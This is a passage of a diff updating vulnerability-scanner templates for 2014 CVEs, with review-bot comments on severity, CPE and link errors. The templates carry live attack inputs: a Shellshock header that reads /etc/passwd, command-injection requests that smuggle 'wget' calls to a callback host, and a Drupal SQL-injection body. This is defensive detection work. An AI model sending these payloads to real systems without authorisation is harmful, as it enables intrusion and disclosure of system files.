CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 - tags: cve,cve2014,lfi,router,firmware,traversal + epss-score: 0.95825 + cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: belkin + product: n150_f9k1009_firmware + tags: cve,cve2014,lfi,router,firmware,traversal http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index f253d982d2..a44cb5d98e 100644 --- a/http/cves/2014/CVE-2014-3120.yaml 
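Review bot: The NVD reference kept as context in the CVE-2014-2962 hunk reads `https://nvd.nist.gov/vuln/detail/CVE-2014-2962l`, with a stray `l` after the CVE id, so the link resolves to nothing. Since this commit is adding references and NVD-derived fields to the same block, fixing it to `- https://nvd.nist.gov/vuln/detail/CVE-2014-2962` belongs here.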
+++ b/http/cves/2014/CVE-2014-3120.yaml @@ -3,7 +3,7 @@ id: CVE-2014-3120 info: name: ElasticSearch v1.1.1/1.2 RCE author: pikpikcu - severity: critical + severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. reference: @@ -11,14 +11,19 @@ info: - https://www.elastic.co/blog/logstash-1-4-3-released - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://bouk.co/blog/elasticsearch-rce/ + - https://www.elastic.co/community/security/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2014-3120 - tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic + cwe-id: CWE-284 + epss-score: 0.58403 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elasticsearch + product: elasticsearch + tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic http: - raw: @@ -49,14 +54,14 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "application/json" - part: header - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 211404160b..3e8d8748a8 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml 
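Review bot: The classification hunk lowers an unauthenticated remote code execution template to `severity: medium` (v2 6.8 replacing the v3.1 10.0) while the `tags` line it moves still carries `kev`, i.e. CISA lists the CVE as exploited in the wild, and the `rce` tag and description are unchanged. Scans filtered on `-severity critical,high` will now skip a KEV-listed RCE, which is the opposite of what the tag is meant to signal. The `cwe-id` also changes from CWE-77 (command injection) to CWE-284 (improper access control); if that mirrors the NVD record it is fine, otherwise CWE-77 matches the template's behaviour better. I'd keep `severity: critical` for KEV entries regardless of the v2 base score, or at least document the rule applied.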
@@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 - tags: cve,cve2014,seagate,rce,edb + epss-score: 0.54403 + cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: seagate + product: blackarmor_nas_220_firmware + tags: cve,cve2014,seagate,rce,edb http: - raw: @@ -24,7 +28,6 @@ http: GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 022f1df1f7..3f91d4084b 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -19,11 +19,14 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 + epss-score: 0.97529 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"drupal" + vendor: drupal + product: drupal tags: edb,cve,cve2014,drupal,sqli - variables: num: "999999999" @@ -31,16 +34,17 @@ http: - method: POST path: - "{{BaseURL}}/?q=node&destination=node" + body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a' matchers-condition: and matchers: - type: word + part: body words: - "PDOException" - '{{md5({{num}})}}' condition: and - part: body - type: status status: diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 1cfa729b6f..de71d819bb 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml 
@@ -10,14 +10,19 @@ info: - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 - https://nodesecurity.io/advisories/st_directory_traversal + - http://www.openwall.com/lists/oss-security/2014/05/13/1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2014-3744 cwe-id: CWE-22 - tags: cve,cve2014,lfi,nodejs,st + epss-score: 0.00672 + cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nodejs + product: node.js + tags: cve,cve2014,lfi,nodejs,st http: - method: GET @@ -26,9 +31,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 96b1feb895..e8dd39dede 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html + - http://seclists.org/fulldisclosure/2014/Dec/23 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - tags: cve,cve2014,weblogic,oracle,ssrf,oast + epss-score: 0.96955 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: fusion_middleware + tags: seclists,cve,cve2014,weblogic,oracle,ssrf,oast http: - method: GET @@ -26,11 +31,11 @@ http: matchers-condition: and matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - type: status status: - 200 - - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" 
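Review bot: The new `cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*` with `vendor: nodejs` / `product: node.js` attributes this issue to the Node.js runtime, while the `st` tag, the `snyk.io/vuln/npm:st` and `st_directory_traversal` references and the GHSA link all identify the `st` static-file module as the affected product. Asset-matching tools that key on CPE would flag every Node.js install instead of hosts serving files through `st`. Worth checking the NVD record for the CPE it actually assigns and using that; if NVD has none, `product: st` with no `cpe` line is more honest than pointing at the runtime.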
diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 7ff7ff7aec..fea1ded33b 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -10,12 +10,17 @@ info: - http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2014-4513 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00145 + cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/activehelper-livehelp" + framework: wordpress + vendor: activehelper + product: activehelper_livehelp_live_chat tags: cve,cve2014,wordpress,xss,wp-plugin http: @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 50a4248536..7949471a6e 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4535 cwe-id: CWE-79 - cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth + cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: import_legacy_media_project + product: import_legacy_media + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index f021007756..73319e63ff 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml 
@@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 - cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:*:*:* epss-score: 0.00149 + cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" + framework: wordpress + vendor: katz + product: infusionsoft_gravity_forms tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: @@ -30,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 14399a497b..df1c8f6d24 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4539 cwe-id: CWE-79 - cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth + cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: movies_project + product: movies + tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 8123dd1a22..726abc9a94 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml 
@@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 - cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:*:*:* epss-score: 0.00118 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth + cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: podcast_channels_project + product: podcast_channels + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 171354f1e5..9483e844c5 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4550 cwe-id: CWE-79 - cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:*:*:* epss-score: 0.00135 + cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/shortcode-ninja" + framework: wordpress + vendor: visualshortcodes + product: ninja tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth http: @@ -29,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index f7dd5da187..40cf362e53 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml 
@@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 - cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:*:*:* epss-score: 0.00135 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth + cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: cybercompany + product: swipehq-payment-gateway-woocommerce + tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "'>" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 1040f59352..40f279eea4 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:*:*:*:*:*:*:*:* epss-score: 0.00098 - tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth + cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: ultimate-weather_project + product: ultimate-weather + tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth http: - method: GET @@ -28,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index f4144e1d81..e17395c8c0 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml 
@@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4592 cwe-id: CWE-79 - cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:*:*:* epss-score: 0.00135 + cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-planet" + framework: wordpress + vendor: czepol + product: wp-planet tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth http: @@ -29,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 65a425a42f..4e3bf6b71e 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -3,20 +3,25 @@ id: CVE-2014-4940 info: name: WordPress Plugin Tera Charts - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4940 + cwe-id: CWE-22 + epss-score: 0.03891 + cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/tera-charts" + framework: wordpress + vendor: tera_charts_plugin_project + product: tera-charts tags: cve,cve2014,wordpress,wp-plugin,lfi http: 
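Review bot: The `severity: high` → `severity: medium` drop in CVE-2014-4940 is a by-product of swapping the CVSS v3.1 vector for NVD's v2 vector (`cvss-score: 7.5` → `cvss-score: 5`), not a reassessment of the finding; the same substitution lowers CVE-2014-5111, CVE-2014-8682, CVE-2014-9119, CVE-2015-1579 and, most visibly, the `kev`-tagged CVE-2015-1427 from `critical` to `high`. CVSS v2 tops out at 10 with no critical band, so v2-scored templates systematically read one tier lower than v3-scored ones, which skews triage wherever scan output is sorted or filtered by severity. Where the template already carried a v3 vector I would keep it (`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` with `cvss-score: 7.5`) and only add the new `epss-score`/`cpe`/`vendor`/`product` fields, or at minimum leave `severity` untouched on entries tagged `kev`.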
@@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 081b56d92c..3632830561 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -3,7 +3,7 @@ id: CVE-2014-4942 info: name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. reference: @@ -11,13 +11,20 @@ info: - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-4942 cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + epss-score: 0.01024 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: levelfourdevelopment + product: wp-easycart + tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure http: - method: GET @@ -39,7 +46,7 @@ http: extractors: - type: regex - part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' + part: body diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 47e4da4d08..c1a1eb9827 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml 
@@ -3,20 +3,24 @@ id: CVE-2014-5111 info: name: Fonality trixbox - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. reference: - https://www.exploit-db.com/exploits/39351 - https://nvd.nist.gov/vuln/detail/CVE-2014-5111 - http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2014-5111 - tags: packetstorm,cve,cve2014,lfi,trixbox,edb + cwe-id: CWE-22 + epss-score: 0.0445 + cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netfortris + product: trixbox + tags: packetstorm,cve,cve2014,lfi,trixbox,edb http: - method: GET @@ -25,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 22337b5976..e19eb46c6f 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml 
@@ -3,21 +3,26 @@ id: CVE-2014-5258 info: name: webEdition 6.3.8.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5258 - https://www.exploit-db.com/exploits/34761 - http://packetstormsecurity.com/files/128301/webEdition-6.3.8.0-Path-Traversal.html - http://www.webedition.org/de/webedition-cms/versionshistorie/webedition-6/version-6.3.9.0 + - http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2014-5258 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2014,lfi + epss-score: 0.01386 + cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: webedition + product: webedition_cms + tags: edb,packetstorm,cve,cve2014,lfi http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 3af899c0e6..d8c0b70213 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml 
@@ -3,20 +3,26 @@ id: CVE-2014-5368 info: name: WordPress Plugin WP Content Source Control - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 - https://www.exploit-db.com/exploits/39287 - http://seclists.org/oss-sec/2014/q3/417 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/95374 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-5368 cwe-id: CWE-22 + epss-score: 0.08268 + cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/wp-source-control" + framework: wordpress + vendor: wp_content_source_control_project + product: wp_content_source_control tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists http: @@ -27,10 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - part: body condition: and - type: status diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index e4ab574638..1da67e0e8b 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml 
@@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-7169 - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A + - http://advisories.mageia.org/MGASA-2014-0388.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-6271 cwe-id: CWE-78 - cpe: cpe:2.3:a:gnu:bash:*:*:*:*:*:*:*:* - epss-score: 0.9756 - tags: cve,cve2014,rce,shellshock,kev + epss-score: 0.97566 + cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 + vendor: gnu + product: bash + tags: cve,cve2014,rce,shellshock,kev http: - method: GET @@ -33,19 +36,20 @@ http: - "{{BaseURL}}/debug.cgi" - "{{BaseURL}}/cgi-bin/test-cgi" + stop-at-first-match: true + headers: Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " - stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex part: body regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 9dffd38eb5..02ecc35cd5 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -1,4 +1,4 @@ -id: CVE-2014-6287 +id: 'CVE-2014-6287' info: name: HTTP File Server <2.3c - Remote Command Execution 
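Review bot: The new `cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*` pins CVE-2014-6271 to a single Bash release, whereas the line it replaces covered the whole product; Shellshock affects every Bash release up to 4.3, and 1.14.0 is merely the first entry in NVD's configuration list. For a `kev`-tagged template that fires eight CGI probes (`max-request: 8`), a version-specific CPE misleads anything that correlates or suppresses results by CPE. I would keep the wildcard version, `cpe: cpe:2.3:a:gnu:bash:*:*:*:*:*:*:*:*`. The same `*` → single-version narrowing appears in CVE-2014-4561 (`1.0`), CVE-2014-9607 (`4.0.3`) and CVE-2014-9615 (`4.0.4`); worth confirming each of those is genuinely a single-version advisory before pinning.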
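Review bot: `id: 'CVE-2014-6287'` quotes the identifier while every other template touched by this commit leaves `id:` and `cve-id:` as plain scalars (e.g. `id: CVE-2014-6308` in the next file); the `cve-id: 'CVE-2014-6287'` change in this file's following hunk does the same. The quotes do not alter the YAML value, but they are inconsistent with the rest of the repository and read like a tooling artifact rather than an intended change. I would revert both to `id: CVE-2014-6287` and `cve-id: CVE-2014-6287`.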
@@ -15,16 +15,17 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2014-6287 + cve-id: 'CVE-2014-6287' cwe-id: CWE-94 + epss-score: 0.97315 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* - epss-score: 0.97414 metadata: max-request: 1 shodan-query: http.favicon.hash:2124459909 verified: true + vendor: rejetto + product: http_file_server tags: packetstorm,msf,cve,cve2014,hfs,rce,kev - variables: str1: '{{rand_base(6)}}' str2: 'CVE-2014-6287' diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index e8c35b0343..382394a121 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -3,21 +3,26 @@ id: CVE-2014-6308 info: name: Osclass Security Advisory 3.4.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php. reference: - https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2014-6308 - https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435 - https://www.netsparker.com/lfi-vulnerability-in-osclass/ + - http://blog.osclass.org/2014/09/15/osclass-3-4-2-ready-download/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-6308 cwe-id: CWE-22 - tags: cve,cve2014,lfi,packetstorm + epss-score: 0.0922 + cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: osclass + product: osclass + tags: cve,cve2014,lfi,packetstorm http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 